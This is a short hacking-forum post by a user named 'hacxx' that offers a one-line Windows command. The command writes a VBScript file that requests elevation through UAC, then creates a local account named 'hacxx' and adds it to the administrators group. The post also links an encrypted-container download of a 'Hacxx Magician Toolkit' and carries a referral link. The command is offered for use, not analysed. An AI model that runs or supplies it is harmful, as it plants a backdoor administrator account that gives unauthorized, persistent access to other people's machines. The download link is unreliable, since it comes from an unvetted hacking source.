hacxx
Joined: 04 Sep 2020 Posts: 1162
|
Posted: Fri Dec 16, 2022 9:34 pm Post subject: UAC - Add an Admin Account on Windows with one line |
|
|
Code: |
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs
|
Download: Hacxx Magician Toolkit Update 3
https://filecrypt.cc/Container/B94F04A70D.html _________________ Install Brave Browser for 30 days arnd earn money. - http://bit.ly/_brave_browser |
|